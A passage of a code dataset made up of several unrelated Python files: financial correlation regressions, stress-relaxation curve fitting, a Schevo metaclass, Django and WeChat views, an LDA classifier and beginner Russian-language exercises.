df_idx['881001.WI'] / 100).cumprod()\n\nplt.plot(sr_corr, 'r')\nplt.twinx()\nplt.plot(sr_881, 'b')\n\nplt.plot(sr_beta, 'g')\nplt.twinx()\nplt.plot(sr_881, 'b')\n\nplt.figure(figsize=(25,8))\nplt.plot(sr_corr, 'g')\nplt.twinx()\nplt.plot(sr_881, 'b')\n\ndef corr_spearman(df, lag):\n sr = pd.Series(index=df.index, name='corr')\n for i in range(lag, len(df)):\n sr.iloc[i] = df.iloc[i-lag:i].corr(method='spearman').iloc[0, -1]\n return sr\n\nsr_corr_sm = corr_spearman(df_idx, lag)\n \nplt.plot(sr_corr.index, sr_corr, sr_corr_sm)\nplt.grid()\n\n\n# 处理利率和通胀数据\ndf_rate = pd.read_csv('rate.csv', index_col=0, parse_dates=[0])\ndf_rate = df_rate.resample('M').mean()\ndf_cpi = pd.read_csv('cpi.csv', index_col=0, parse_dates=[0])\n\n# 对齐\nsr_corr.name='Corr'\nsr_corr = sr_corr['2003':'2018-06']\nsr_rate = df_rate.Rate['2003':'2018-06']\nsr_cpi = df_cpi.CPI['2003':'2018-06']\n\n# 回归\nfrom sklearn import linear_model\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_rate.values, sr_cpi.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n# 处理增长和货币数据\ndf_m2 = pd.read_csv('m2.csv', index_col=0, parse_dates=[0])\ndf_gdp = pd.read_csv('gdp.csv', index_col=0, parse_dates=[0])\nsr_m2 = df_m2.M2['2003':'2018-06']\nsr_gdp = df_gdp.GDP['2003':'2018-06']\ndf_tmp = pd.concat([sr_m2, sr_gdp], axis=1)\ndf_tmp = df_tmp.fillna(method='bfill')\nsr_gdp = df_tmp.GDP\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_rate.values, sr_cpi.values, sr_m2.values, sr_gdp.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n# 转入R处理协整\ndf_r = pd.DataFrame(np.vstack([X, y]).T, index=sr_corr.index, columns=['rate', \n 'cpi', 'm2', 'gdp', 'corr'])\n\ndf_r.to_csv('df_r.csv')\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_cpi.values, sr_m2.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n# 按日计算相关系数\n\n# =============================================================================\n# from WindPy import w\n# w.start()\n# \n# def getWsd(wsd):\n# df = pd.DataFrame(wsd.Data).T\n# df.index = wsd.Times\n# df.columns = wsd.Codes \n# return df\n# \n# wsd = w.wsd(\"881001.WI, CBA00102.CS\", \"pct_chg\", \"2000-01-01\", \"2018-07-31\", \"Period=D\")\n# df_idx = getWsd(wsd)\n# w.stop()\n# \n# =============================================================================\ndf = pd.read_csv('df.csv', index_col=0, parse_dates=[0])\nsr_corr = df.resample('M').apply(lambda x: x.corr().iloc[0, 1])\nsr_corr.name = \"corr\"\n\nsr_beta = df.resample('M').apply(lambda x: x.corr().iloc[0, 1] / x.iloc[:, 0].std()\n * x.iloc[:, 1].std())\n\n\nsr_corr_y = df.resample('Y').apply(lambda x: x.corr().iloc[0, 1])\nsr_beta_y = df.resample('Y').apply(lambda x: x.corr().iloc[0, 1] / x.iloc[:, 0].std()\n * x.iloc[:, 1].std())\n\n\n# 处理利率和通胀、增长和货币数据\ndf_rate = pd.read_csv('rate.csv', index_col=0, parse_dates=[0])\ndf_rate = df_rate.resample('M').mean()\ndf_cpi = pd.read_csv('cpi.csv', index_col=0, parse_dates=[0])\ndf_m2 = pd.read_csv('m2.csv', index_col=0, parse_dates=[0])\ndf_gdp = pd.read_csv('gdp.csv', index_col=0, parse_dates=[0])\n\n# 对齐\nsr_corr = sr_corr['2002':'2018-06']\nsr_rate = df_rate.Rate['2002':'2018-06']\nsr_cpi = df_cpi.CPI['2002':'2018-06']\nsr_m2 = df_m2.M2['2002':'2018-06']\nsr_gdp = df_gdp.GDP['2002':'2018-06']\n\ndf_tmp = pd.concat([sr_m2, sr_gdp], axis=1)\ndf_tmp = df_tmp.fillna(method='bfill')\nsr_gdp = df_tmp.GDP\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_rate.values, sr_cpi.values, sr_m2.values, sr_gdp.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n# 转入R处理协整\ndf_r = pd.DataFrame(np.vstack([X, y]).T, index=sr_corr.index, columns=['rate', \n 'cpi', 'm2', 'gdp', 'corr'])\n\ndf_r.to_csv('df_r.csv')\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_cpi.values, sr_m2.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n\n# =============================================================================\n# 全部重来\n# =============================================================================\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nfrom sklearn import linear_model\n\n#from WindPy import w\n#w.start()\n# \n#def getWsd(wsd):\n# df = pd.DataFrame(wsd.Data).T\n# df.index = wsd.Times\n# df.columns = wsd.Codes \n# return df\n# \n#wsd_d = w.wsd(\"881001.WI, CBA00102.CS\", \"pct_chg\", \"2000-01-01\", \"2018-07-31\", \"Period=D\")\n#wsd_m = w.wsd(\"881001.WI, CBA00102.CS\", \"pct_chg\", \"2000-01-01\", \"2018-06-30\", \"Period=M\")\n#\n#df_d = getWsd(wsd_d)\n#df_m = getWsd(wsd_m)\n#w.stop()\n\n#df_d.dropna().to_csv('df_d.csv')\n#df_m.dropna().to_csv('df_m.csv')\n\n\ndf_m = pd.read_csv('df_m.csv', index_col=0, parse_dates=[0])\n\nlag = 12\ncorr = df_m['881001.WI'].rolling(lag).corr(df_m['CBA00102.CS'])\nbeta = corr / df_m['881001.WI'].rolling(lag).std() * df_m['CBA00102.CS'].rolling(lag).std()\ncorr.name = 'corr'\nbeta.name = 'beta'\n\ny_e = df_m['881001.WI']\ny_b = df_m['CBA00102.CS']\n\n# 一图胜千言\n\n# fig1\n# =============================================================================\n# sort = df_m[df_m['881001.WI']<0].sort_values(by='881001.WI').values\n# \n# fig, ax = plt.subplots(dpi=200)\n# ax.bar(np.arange(len(sort)), sort[:,0], label='Stock')\n# ax.set_ylabel(\"Stock (%)\")\n# ax.legend(loc=3)\n# ax2 = ax.twinx()\n# ax2.plot(np.arange(len(sort)), sort[:,1], 'r', label='Bond')\n# ax2.axhline(0, color='k')\n# ax2.set(ylim=[-2, 2])\n# ax2.set_ylabel(\"Bond (%)\")\n# ax2.legend(loc=4)\n# =============================================================================\n\n# fig2\n# =============================================================================\n# sort = df_m.sort_values(by='881001.WI').values\n# for i in range(5):\n# s = i * len(sort) // 5\n# e = (i + 1) * len(sort) // 5\n# plt.hist(sort[s:e, 1], bins=7)\n# plt.show()\n# =============================================================================\n\n\n# 扩展因子; 增长,通胀,利率, 流动性\n# GDP增速,CPI, DR007, M2, \n\n# 处理利率和通胀、增长和货币数据\ndf_rate = pd.read_csv('rate.csv', index_col=0, parse_dates=[0])\ndf_rate = df_rate.resample('M').mean()\ndf_cpi = pd.read_csv('cpi.csv', index_col=0, parse_dates=[0])\ndf_m2 = pd.read_csv('m2.csv', index_col=0, parse_dates=[0])\ndf_gdp = pd.read_csv('gdp.csv', index_col=0, parse_dates=[0])\n\n# 对齐\ncorr = corr['2003':'2018-06']\nrate = df_rate.Rate['2003':'2018-06']\ncpi = df_cpi.CPI['2003':'2018-06']\nm2 = df_m2.M2['2003':'2018-06']\ngdp = df_gdp.GDP['2003':'2018-06']\n\ndf_tmp = pd.concat([m2, gdp], axis=1)\ndf_tmp = df_tmp.fillna(method='bfill')\ngdp = df_tmp.GDP\n\ny_e = y_e['2003':'2018-06']\ny_b = y_b['2003':'2018-06']\n\n\n# 很强的自相关性,回归不如自回归\nreg = linear_model.LinearRegression()\nX = np.vstack([rate.values, cpi.values, m2.values, gdp.values])\ny = corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(corr.index, y, corr.index, y_p)\nplt.plot(corr.index, y, corr.index[1:], y[:-1])\n\n# 转入R\ndata = np.vstack([corr.values, rate.values, cpi.values, m2.values, \n gdp.values, y_e.values, y_b.values])\ncol_names = ['corr', 'rate', 'cpi', 'm2', 'gdp', 'y_e', 'y_b']\nRdata = pd.DataFrame(data.T, index=corr.index, columns=col_names)\nRdata.index.name = 'Date'\nRdata.to_csv('Rdata.csv')\n\n# \nreg = linear_model.LinearRegression()\nX = np.vstack([rate.diff().values, cpi.diff().values, m2.diff().values, gdp.diff().values])\ny = corr.values\nreg.fit(X[:, 1:].T, y[1:])\ny_p = reg.predict(X[:, 1:].T)\nplt.plot(corr.index[1:], y[1:], corr.index[1:], y_p)\n","sub_path":"EB_corr.py","file_name":"EB_corr.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246011010","text":"\"\"\"\nFILE: stress_resistance_relaxation.py\nAUTHOR: R Ellingham\nDATE MODIFIED: Jun 2021\nDATE CREATED: Jun 2021\nPROGRAM DESC: Matlab style script for fitting a relaxation model to stress and \napparent resistance relaxation data.\nNOTES: Made for SPyder IDE\n\nTODO:\n1)\n2)\n\"\"\"\n\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import optimize\nimport scipy.stats as stats\nimport matplotlib\nimport data_ems\n\n#%% Setup parameters and determine all stress and strain values\n\n# Test specimen dimensions (in m):\nspec_length = 40e-3\nspec_length_inner_electrodes = 20e-3\nspec_width = 10e-3\nspec_thickness = 4e-3\n\ninput_filename = \"2_7-5_E4pin_20mm_v6.csv\"\n\n# Extract experimental csv data\nRo,Ri,tR,P,tP,F,tF = data_ems.extract_csv(input_filename)\n\n# Correct any erroneously gathered position values and scale to meters\nP = data_ems.pos_outlier_corrector(P) * 1e-3 \n\n# Interpolate data to get a constant smaple frequency across all measurements\nt_lin, F_t, P_t, Ro_t, Ri_t = data_ems.interpolate_RFS_data(Ro,Ri,tR,P,tP,F,tF)\n\n# Use a MAF on the resistance data if it is an 'AC' measurement\nRi_t = data_ems.MAF(Ri_t,12)\n\n## Strain ##\n# Calc engineering strain from displacement\nStrain_eng_t = P_t/(spec_length) #dx/x\n# Calc true strain\nStrain_log_t = np.log((P_t+spec_length)/(spec_length))\n\n## Stress ##\n# Calc engineering stress\nA_0 = spec_width * spec_thickness # initial cross-sectional area\nStress_eng_t = F_t/A_0\n# Calc stress from force and changing cross-sectional area\npoisson_ratio = 0.29 # Poisson's ratio. Found experimentally using #2_7.5%dragonskin10NV specimen\nA_t = ((spec_width*spec_thickness)*(-Strain_eng_t*poisson_ratio+1)*(-Strain_eng_t*poisson_ratio+1))\nStress_pois_t = F_t/A_t # My approximation of true stress, with Poisson's ratio\n# Common calc for the approximation of true strain\nStress_true_t = (F_t/A_0) * (1+Strain_eng_t)\n\n# Write interpolated and partially processed data to csv ##\n# data_ems.write_processed_data(input_filename, Ro_t, Ri_t, resistivity_t, Strain_eng_t, Strain_log_t, Stress_pois_t, Stress_eng_t, Stress_true_t, t_lin)\n## ^UN/COMMENT OUT WHEN NOT REQUIRED^ ##\n\n# Plot measurements over time\nfig1, axs1 = plt.subplots(3, 1, constrained_layout=True,figsize = (10, 12))\n\nax = axs1[0]\nax.plot(t_lin, Ri_t,'r-')\nax.set_title('')\nax.set_ylabel('Resistance [Ohm]')\nax.grid(True)\n\nax = axs1[1]\nax.plot(t_lin, Stress_eng_t,'r-',t_lin, Stress_pois_t,'b-',t_lin, Stress_true_t,'g-')\nax.set_title('')\nax.legend((\"Eng\",\"Poisson\",\"True\"), loc='upper right')\nax.set_ylabel('Stress [Pa]')\nax.grid(True)\n\nax = axs1[2]\nax.plot(t_lin, Strain_eng_t,'r-',t_lin, Strain_log_t,'b-')\nax.set_title('')\nax.legend((\"Eng\",\"True\"), loc='upper right')\nax.set_ylabel('Strain')\nax.grid(True)\n\nax.set_xlabel('Time [s]')\n\n#%% Resistivity investigation\n\n## Resistivity calc ##\nresistivity_t = (Ri_t*A_t)/((1+Strain_log_t)*spec_length_inner_electrodes)\n\n# Plot measurements over time\nfig2, axs2 = plt.subplots(2, 1, constrained_layout=True,figsize = (10, 6))\n\nax = axs1[0]\nax.plot(t_lin, Ri_t,'r-')\nax.set_title('')\nax.set_ylabel('Resistance [Ohm]')\nax.grid(True)\n\nax = axs1[1]\nax.plot(t_lin, resistivity_t,'r-')\nax.set_title('')\nax.set_ylabel('Resistivity [Ohm.m]') # Res-strain time delay may affect data significantly?\nax.grid(True)\n\n\n#%% Split data into separate pulses so each relaxation/loading-cycle can be analysed separately\n\nstrain_splits = data_ems.split_ramp_data(Strain_log_t)\nfor i in range(len(strain_splits)):\n print(t_lin[strain_splits[i]])\n\n# take chunks of stress and resistance relaxing values from index i1 to i2\ni1 = []\ni2 = []\nfor i in range(int(len(strain_splits)/4)):\n i1.append(int(4*i + 2))\n i2.append(int(4*i + 3))\n\n#%% Fitting a line to the stress-strain loading and unloading data\n\n# Plot relaxation and fit curve\n\n# Simple linear function to fit the stress-strain relationship\ndef lin_func(x,m,c):\n return m*x + c\n\nconsts_lin_fit = []\np_init = [1,1]\n\nconstsu_lin_fit = []\npu_init = [1,1]\n\nfig3, ax3 = plt.subplots(figsize=(12,6))\n# for i in range(1,int(len(strain_splits))):\nfor i in range(5):\n Strain_load = Strain_log_t[int(strain_splits[4*i+1]):int(strain_splits[4*i+2])] # Using log strain as a better representation of the strain of the material\n Strain_unload = Strain_log_t[int(strain_splits[4*i+3]):int(strain_splits[4*i+4])]\n\n Stress_load = Stress_pois_t[int(strain_splits[4*i+1]):int(strain_splits[4*i+2])]\n # Stress_load_min = np.min(Stress_load)\n # Stress_load = Stress_load - Stress_load_min\n Stress_unload = Stress_pois_t[int(strain_splits[4*i+3]):int(strain_splits[4*i+4])]\n # Stress_unload_min = np.min(Stress_load)\n # Stress_unload = Stress_load - Stress_load_min\n \n # Stress-strain loading fitting\n poptS, pcovS = optimize.curve_fit(lin_func, Strain_load, Stress_load, p0=p_init, maxfev=50000)\n p_init = poptS\n Strain_load_lin = np.linspace(min(Strain_load),max(Strain_load) , 100)\n Stress_load_lin = lin_func(Strain_load_lin,*poptS)\n consts_lin_fit.append(poptS) # Store fitted parameters of each relaxation\n \n # Stress-strain unloading fitting\n poptSu, pcovSu = optimize.curve_fit(lin_func, Strain_unload, Stress_unload, p0=pu_init, maxfev=50000)\n pu_init = poptSu\n Strain_unload_lin = np.linspace(min(Strain_unload),max(Strain_unload) , 100)\n Stress_unload_lin = lin_func(Strain_load_lin,*poptSu)\n constsu_lin_fit.append(poptSu) # Store fitted parameters of each relaxation\n \n ## Plot stress-strain loading/unloading of specimen\n # fig3, ax3 = plt.subplots(figsize=(16,8))\n # Loading\n ax3.plot(100*Strain_load,Stress_load,color='r',marker='x',ls='')\n # ax3.plot(Strain_load_lin,Stress_load_lin,color='y',ls='-')\n # Unloading\n ax3.plot(100*Strain_unload,Stress_unload,color='b',marker='x',ls='')\n # ax3.plot(Strain_unload_lin,Stress_unload_lin,color='g',ls='-')\n ax3.legend([\"Loading\", \"Unloading\"])\n ax3.set_ylabel('Stress [Pa]')\n ax3.set_xlabel('Strain [%]')\n\n\n#%% Fitting models to the stress relaxation data\n\n# Curve fitting code (curve_fit func using non-lin lstsqr)\ne0 = .10 # We should b\n# e able to input the elastic modulus parameter found in the previous section\n\n# Viscoelastic models to fit data to \ndef SLS_relax(t,E1,E2,C,mu):\n return (E1*E2)/(E1+E2) * e0 + C*np.exp(-((E1+E2)/mu)*t)\n\ndef SLS_relax_simple(t,E1,E2,C,mu):\n return E1 * e0 + C*np.exp(-(E2/mu)*t)\n\ndef generalised_SLS_2e(x, a0, a1, tau_1, a2, tau_2): # generalised Kelvin SLS relaxation model for n = 2\n return a0 + a1 * np.exp(-x/tau_1) + a2 * np.exp(-x/tau_2) \n\ndef generalised_SLS_3e(x, a0, a1, tau_1, a2, tau_2, a3, tau_3): # generalised Kelvin SLS relaxation model for n = 3\n return a0 + a1 * np.exp(-x/tau_1) + a2 * np.exp(-x/tau_2) + a3 * np.exp(-x/tau_3)\n\n## Fit the stress relaxation single element SLS model\n\n# Stress modelling\nconsts_SLS = []\npSLS_init = [1,1,1,1] # initial guess of parameters\n\nstart_offset = 6 # index offset to compensate for time lag between strain change and resistance/stress\nend_offset = 1\n\nfor i in range(1,int(len(strain_splits)/4)): \n \n Strain_load = Strain_log_t[int(strain_splits[i1[i]])+start_offset:int(strain_splits[i2[i]])-end_offset]\n\n Stress_load = Stress_pois_t[int(strain_splits[i1[i]])+start_offset:int(strain_splits[i2[i]])-end_offset]\n Stress_load_min = np.min(Stress_load)\n Stress_load = Stress_load - Stress_load_min\n\n t_load = t_lin[int(strain_splits[i1[i]])+start_offset:int(strain_splits[i2[i]])-end_offset]\n t_load = t_load - t_load[0]\n \n ## Levenberg–Marquardt algorithm for non-linear leastsq, fitting the stress data to generalised SLS relaxation models\n # Stress fitting\n poptS_SLS, pcovS_SLS = optimize.curve_fit(SLS_relax_simple, t_load, Stress_load, p0=pSLS_init, maxfev=50000)\n \n pSLS_init = poptS_SLS # Have the next initial guess of the next relaxation equal the previous relaxation's fitted parameters\n \n # Make curve for fitted model\n t_load_lin = np.linspace(min(t_load),max(t_load) , 100)\n Stress_load_lin_SLS = SLS_relax_simple(t_load_lin,*poptS_SLS) + Stress_load_min\n poptS_SLS[0] = poptS_SLS[0] + Stress_load_min\n consts_SLS.append(poptS_SLS) # Store fitted parameters of each relaxation\n \n # Determine the goodness of fit\n Error = Stress_load - SLS_relax_simple(t_load,*poptS_SLS) + Stress_load_min\n \n fig4, ax4 = plt.subplots(figsize = (10, 5))\n ax.plot(t_load,Error,'r-')\n ax.set_xlabel('Time[s]')\n ax.set_ylabel('Stress [Pa]',color='r')\n \n # Plot relaxation data against\n fig5, ax5 = plt.subplots(figsize = (10, 5))\n ax.plot(t_load,Stress_load + Stress_load_min,'rx',t_load_lin,Stress_load_lin_SLS,'y-')\n ax.set_xlabel('Time[s]')\n ax.set_ylabel('Stress [Pa]',color='r')\n","sub_path":"stress_resistance_relaxation.py","file_name":"stress_resistance_relaxation.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"273181155","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-fat/egg/schevo/meta.py\n# Compiled at: 2007-03-21 14:34:41\n\"\"\"Metaclasses.\n\nFor copyright, license, and warranty, see bottom of file.\n\"\"\"\nimport sys\nfrom schevo.lib import optimize\nfrom schevo.fieldspec import field_spec_from_class\nfrom schevo.label import label_from_name\nimport schevo.namespace\n\ndef schema_metaclass(namespace_name):\n \"\"\"Return a metaclass that adds subclasses to a namespace of a\n SchemaDefinition.\"\"\"\n\n class Meta(type):\n __module__ = __name__\n\n def __init__(cls, class_name, bases, class_dict):\n type.__init__(cls, class_name, bases, class_dict)\n if '_label' not in class_dict:\n cls._label = label_from_name(class_name)\n if schevo.namespace.SCHEMADEF is not None and hasattr(cls, '_field_spec'):\n cls._field_spec = field_spec_from_class(cls, class_dict)\n ns = getattr(schevo.namespace.SCHEMADEF, namespace_name)\n try:\n ns._set(class_name, cls)\n except KeyError:\n pass\n\n return\n\n return Meta\n\n\noptimize.bind_all(sys.modules[__name__])","sub_path":"pycfiles/Schevo-3.0-py2.4-macosx-10.3-fat/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"416155439","text":"# -*- coding: utf-8 -*-\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\n\nimport achtelbass_web\nfrom locales_en import locales\nlocales_inverse = dict([[v,k] for k,v in locales.items()]) #CHANGEME braucht man das?\n\ndef index(request):\n template = loader.get_template('generate_notes/index.html')\n context = RequestContext(request, {})\n\n parameters = {'tonic' : request.POST.get('tonic', 'C'),\n 'mode' : request.POST.get('mode', 'Major'),\n 'grand_staff' : request.POST.get('grand_staff', False),\n 'chords_frequency' : request.POST.get('chords_frequency', 0),\n 'intervals' : request.POST.getlist('intervals', ['Second']),\n 'inversion' : False,\n 'min_pitch' : request.POST.get('min_pitch', 'C'),\n 'max_pitch' : request.POST.get('max_pitch', 'c'),\n 'rest_frequency' : request.POST.get('rest_frequency', 0),\n 'time_signature' : request.POST.get('time_signature','4/4'),\n 'note_values' : request.POST.getlist('note_values', ['1', '1/2', '1/4']),\n 'tuplets' : request.POST.getlist('tuplets', [0]),\n 'tuplet_same_pitch' : False,\n 'tuplets_frequency' : request.POST.get('tuplets_frequency',0),\n 'prolongations' : False,\n 'prolongations_frequency' : 0,\n 'bpm' : 60,\n 'tempo' : 'andante',\n }\n \n \n achtelbass_obj = achtelbass_web.Achtelbass(parameters, locales)\n \n context.__dict__.update(achtelbass_obj.__dict__)\n \n context.preselected = parameters\n\n context.note_value_symbols = {\n '1' : u'𝅝',\n '1/2' : u'𝅗𝅥',\n '1/4' : u'♩',\n '1/8' : u'♪',\n '1/16' : u'𝅘𝅥𝅯',\n '1/32' : u'𝅘𝅥𝅰',\n '1/64' : u'𝅘𝅥𝅱',\n }\n\n context.note_value_names = achtelbass_obj.Note_Names\n \n context.generated_notes = achtelbass_obj.display()\n \n return HttpResponse(template.render(context))\n","sub_path":"generate_notes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"611639979","text":"# encoding=utf-8\nimport hashlib\nimport time\nimport xmltodict\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\n\n\n# Create your views here\nWEIXIN_TOKEN = 'youpeixuetang'\ndef dingyue(request):\n ''''''\n if request.method == \"GET\":\n signature = request.GET.get(\"signature\", None)\n timestamp = request.GET.get(\"timestamp\", None)\n nonce = request.GET.get(\"nonce\", None)\n echostr = request.GET.get(\"echostr\", None)\n token = WEIXIN_TOKEN\n tmp_list = [token, timestamp, nonce]\n tmp_list.sort()\n tmp_str = \"%s%s%s\" % tuple(tmp_list)\n tmp_str = hashlib.sha1(tmp_str).hexdigest()\n if tmp_str == signature:\n return HttpResponse(echostr)\n else:\n return HttpResponse(\"weixin index\")\n else:\n xml_str = smart_str(request.body)\n req = xmltodict.parse(xml_str)['xml']\n #response_xml = auto_reply_main(request_xml) # \n\n if \"text\" == req.get(\"MsgType\"):\n resp = {\n \"ToUserName\": req.get(\"FromUserName\", \"\"),\n \"FromUserName\": req.get(\"ToUserName\", \"\"),\n \"CreateTime\": int(time.time()),\n \"MsgType\": \"text\",\n \"Content\": req.get(\"Content\", \"\")\n }\n else:\n resp = {\n \"ToUserName\": req.get(\"FromUserName\", \"\"),\n \"FromUserName\": req.get(\"ToUserName\", \"\"),\n \"CreateTime\": int(time.time()),\n \"MsgType\": \"text\",\n \"Content\": \"I love you, itcast!\"\n }\n response_xml = xmltodict.unparse({\"xml\": resp})\n return HttpResponse(response_xml)\n","sub_path":"youpeixuetang/weixin/dingyue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"543449554","text":"import numpy as np\nfrom math import log\n\nclass LDA_Classifier(object):\n\n\tdef __init__(self):\n\t\tself.epsilon = 0.00001 #padding for log\n\n\tdef train(self, X_train, Y_train):\n\n\t#Train the classifier. Compute the empirical covariances and means for each class, and the class priors.\n\n\t\td = X_train.shape[1]\n\t\tY_train = np.reshape(Y_train, (Y_train.size))\n\n\t\tself.class_ids, counts = np.unique(Y_train, return_counts = True)\n\t\tself.class_means = {}\n\t\tself.class_priors = {}\n\t\tself.cov = np.zeros((d, d))\n\t\t\n\t\tfor i in range(self.class_ids.size):\n\t\t\tclass_id = self.class_ids[i]\n\n\t\t\tclass_data = X_train[Y_train == class_id, :]\n\t\t\tclass_mean = np.reshape(np.mean(class_data, axis=0), (1, d))\n\t\t\tclass_cov = (1.0/class_data.shape[0])*(class_data - class_mean).T @ (class_data - class_mean)\n\t\t\t#print(class_cov)\n\t\t\tself.class_means[class_id] = class_mean\n\t\t\tself.class_priors[class_id] = counts[i]/np.sum(counts)\n\t\t\tself.cov = self.cov + class_cov*self.class_priors[class_id]\n\t\treturn None\n\n\tdef predict(self, X_test):\n\t#Predict labels for test data using this classifier.\n\n\t\tn_test = X_test.shape[0]\n\t\td = X_test.shape[1]\n\n\t\tscores = np.empty((n_test, 1))\n\t\tfor i in range(self.class_ids.size):\n\t\t\tclass_id = self.class_ids[i]\n\t\t\tmu = self.class_means[class_id]\n\t\t\tprior = self.class_priors[class_id]\n\n\t\t\tscore = (-1.0/2)*np.diag((X_test - mu) @ np.linalg.inv(self.cov + np.eye(self.cov.shape[0])*self.epsilon) @ (X_test - mu).T) + log(prior)\n\t\t\tscore = np.reshape(score, (n_test, 1))\n\n\t\t\tif i == 0:\n\t\t\t\tscores = scores + score\n\t\t\telse:\n\t\t\t\tscores = np.hstack((scores, score))\n\n\t\tY_hat = self.class_ids[np.argmax(scores, axis = 1)]\n\t\treturn Y_hat\n\ndef main():\n\tpass\n\t# lda_classifier = LDA_Classifier()\n\n\t# X_train = np.random.rand(20, 30)*10\n\t# y_train = np.random.randint(0, 2, (20, 1))\n\t# X_test = np.random.rand(10, 30)*10\n\n\t# lda_classifier.train(X_train, y_train)\n\t# y_hat = lda_classifier.predict(X_test)\n\t# print(y_hat)\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195219155","text":"# Задача-1:\n# Дан список, заполненный произвольными целыми числами, получите новый список,\n# элементами которого будут квадратные корни элементов исходного списка,\n# но только если результаты извлечения корня не имеют десятичной части и\n# если такой корень вообще можно извлечь\n# Пример: Дано: [2, -5, 8, 9, -25, 25, 4] Результат: [3, 5, 2]\n\n'''from random import randint\nimport math\n\nn = int(input(\"Введите количество элементов произвольного списка с целыми числами = \"))\nlist_n = []\nsq_list = []\ni_list = []\nnew_list = []\nfor i in range(n):\n list_n.append(randint(0, 100))\n sq_list.append(math.sqrt(list_n[i]))\n if sq_list[i].is_integer():\n i_list.append(i)\n print(i, \"-й элемент соответствует условиям задания\")\n new_list.append(sq_list[i])\n\nprint(\"Произвольный список целых чисел = \", list_n)\nprint(\"Новый список\", new_list)'''\n\nimport math\nmy_list = [2, -5, 8, 9, -25, 25, 4]\nnew_list = []\nfor element in my_list:\n if (element > 0) and (int(math.sqrt(element)) == math.sqrt(element)):\n new_list.append(int(math.sqrt(element)))\nprint(new_list)\n\n\n# Задача-2: Дана дата в формате dd.mm.yyyy, например: 02.11.2013.\n# Ваша задача вывести дату в текстовом виде, например: второе ноября 2013 года.\n# Склонением пренебречь (2000 года, 2010 года)\n\ndana_data = '04.12.2014'\ndata_list = dana_data.split('.')\ndict_months = {\n'01':'января','02':'феврал','03':'марта','04':'апреля','05':'мая','06':'июня','07':'июля','08':'августа','09':'сентября',\n'10':'октября','11':'ноября','12':'декабря',\n}\ndict_days = {\n'01': 'первое', '02': 'второе', '03': 'третье', '04': 'четвёртое', '05': 'пятое',\n'06': 'шестое', '07': 'седьмое', '08': 'восьмое', '09': 'девятое', '10': 'десятое',\n'11': 'одиннадцатое', '12': 'двенадцатое', '13': 'тринадцатое', '14': 'четырнадцатое', '15': 'пятнадцатое',\n'16': 'шестнадцатое', '17': 'семнадцатое', '18': 'восемнадцатое', '19': 'девятнадцатое', '20': 'двадцатое',\n'21': 'двадцать первое', '22': 'двадцать второе', '23': 'двадцать третье', '24': 'двадцать четвёртое',\n'25': 'двадцать пятое', '26': 'двадцать шестое', '27': 'двадцать седьмое', '28': 'двадцать восьмое',\n'29': 'двадцать девятое', '30': 'тридцатое', '31': 'тридцать первое',\n}\nfor key in dict_days:\n if data_list[0] == key:\n data_list[0] = dict_days[key]\n\nfor key in dict_months:\n if data_list[1] == key:\n data_list[1] = dict_months[key]\n\n#answer_data = data_list[0] + ' ' + data_list[1] + ' ' + data_list[2] + ' ' \"года\"\n#print(answer_data)\nprint(\"{} {} {} года\" .format(data_list[0], data_list[1], data_list[2]))\n\n# Задача-3: Напишите алгоритм, заполняющий список произвольными целыми числами\n# в диапазоне от -100 до 100. В списке должно быть n - элементов.\n# Подсказка:\n# для получения случайного числа используйте функцию randint() модуля random\n\nfrom random import randint\n\nn = int(input(\"Ведите количество элементов списка = \"))\nlist_n = []\nfor i in range(n):\n list_n.append(randint(-100, 100))\n\nprint(\"Произвольный список целых чисел = \", list_n)\n\nimport random\nn = int(input('Enter the number of random items in the list '))\nmy_list = []\nfor el in range(n):\n my_list.append(random.randint(-100, 100))\nprint(my_list)\n\n\n# Задача-4: Дан список, заполненный произвольными целыми числами.\n# Получите новый список, элементами которого будут: \n# а) неповторяющиеся элементы исходного списка:\n# например, lst = 